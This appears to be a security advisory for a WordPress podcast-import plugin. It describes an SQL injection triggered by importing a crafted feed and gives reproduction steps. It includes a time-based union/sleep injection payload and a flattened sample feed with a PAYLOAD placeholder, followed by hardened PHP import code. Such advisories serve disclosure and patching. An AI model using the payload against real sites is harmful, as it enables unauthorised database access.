The plugin does not sanitise and properly escape some imported data, which could allow SQL injection attacks to be performed by importing a malicious podcast file.
Put the XML below on a web server (replacing the PAYLOAD with the correct one), then import a podcast (/wp-admin/tools.php?page=secondlinepodcastimport), put the URL to the XML in the Podcast Feed URL field and click import.

Payloads:

v < 1.3.0 - https://satchmo.secondlinethemes.com/?p=82%') union select (sleep(10));#

v < 1.3.8 -

Dixie WordPress Theme https://dixie.secondlinethemes.com/ A Powerful Podcasting Theme Mon, 09 Nov 2020 10:08:04 +0000 en-US © 2021 Dixie WordPress Theme A Powerful Podcasting Theme Dixie WordPress Theme A Powerful Podcasting Theme Dixie WordPress Theme [email protected] clean Dixie WordPress Theme [email protected] A Powerful Podcasting Theme No Episode 10: New Recording Studios https://dixie.secondlinethemes.com/podcast/episode-10-new-recording-studios/ Wed, 24 Jul 2019 11:16:50 +0000 Dixie PAYLOAD clean no 02:16 Dixie No no
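For reference, the import path fixed in 1.3.8 should treat every feed field as untrusted text and bind it as a query parameter. The following is an added example of that hardened pattern, not the plugin's own code: the table, column names, the post type and the `secure_import_item` helper are assumptions, and the sleep payload quoted in the comment is the one from the advisory above.

```php
<?php
// Added example (not the plugin's code): hardened handling of one podcast
// feed item. Table, columns, post type and helper name are assumptions.

function secure_import_item( array $item ) {
    global $wpdb;

    // Every value parsed from the remote feed is attacker-controlled text.
    $title       = sanitize_text_field( $item['title'] );
    $description = wp_kses_post( $item['description'] );
    $duration    = sanitize_text_field( $item['duration'] );

    // Look up an existing episode by title. esc_like() keeps '%' and '_'
    // literal, and prepare() escapes quotes, so an imported value such as
    // "%') union select (sleep(10));#" is matched as plain text instead of
    // closing the string and reaching the SQL parser as a new statement.
    $like     = '%' . $wpdb->esc_like( $title ) . '%';
    $existing = $wpdb->get_var( $wpdb->prepare(
        "SELECT ID FROM {$wpdb->posts} WHERE post_type = %s AND post_title LIKE %s LIMIT 1",
        'podcast',
        $like
    ) );

    if ( $existing ) {
        return (int) $existing;
    }

    // wp_insert_post() builds its own prepared statements; no raw SQL here.
    return wp_insert_post( array(
        'post_type'    => 'podcast',
        'post_status'  => 'draft',
        'post_title'   => $title,
        'post_content' => $description,
        'meta_input'   => array( 'duration' => $duration ),
    ), true );
}
```

Any remaining raw `$wpdb->query()` call that concatenates a feed field into its SQL string is the pattern to look for when auditing an importer of this kind.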